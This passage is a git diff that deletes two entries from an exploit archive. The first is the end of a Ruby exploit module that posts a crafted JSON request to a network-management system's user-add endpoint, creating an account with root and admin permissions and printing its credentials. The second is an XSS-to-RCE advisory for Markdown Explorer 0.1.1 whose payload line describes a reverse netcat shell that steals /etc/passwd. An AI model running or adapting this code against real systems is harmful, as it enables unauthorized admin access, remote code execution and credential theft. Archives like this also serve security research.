"/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", 
"/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": 
"location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", 
"/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}' - - res = send_request_raw({ - 'method' => 'POST', - 'ctype' => 
'application/json',
- 'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),
- 'cookie' => cookie,
- 'data' => json_data
- })
-
- if res.code == 200 and res.body.include? '"SUCCESS"'
- print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
- print_good("Username : #{datastore["USERNAME"]}")
- print_good("Password : #{datastore["PASSWORD"]}")
- break
- end
- end
- end
-end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49826.js
deleted file mode 100644
index 95afe07da..000000000
--- a/exploits/multiple/webapps/49826.js
+++ /dev/null
@@ -1,29 +0,0 @@
-# Exploit Title: Markdown Explorer 0.1.1 - XSS to RCE
-# Exploit Author: TaurusOmar
-# Date: 04/05/2021
-# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
-# Risk: High (8.8)
-# Vendor Homepage: https://github.com/jersou/markdown-explorer
-# Version: 0.1.1
-# Tested on: Windows, Linux, MacOs
-
-# Software Description:
-Easily explore, view and edit markdown documentation of a file tree.
-If your projects documentation is written in Markdown, with md files dispersed throughout your project tree, Markdown Explorer displays md files in a tree structure, and it allows filtering by file name or by file content.
-Just drop a folder on the window (or click on the folder icon on top left) to show the Markdown documentation of this folder. Then, explore the tree on the left, and toggle view/edit mode on md file with the button on the top right.
-
-
-# Vulnerability Description:
-The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
-The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
-the remote attacker to get remote execution on the computer.
-
-
-#Proof
-https://imgur.com/a/w4bcPWs
-
-
-
-# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
-
-[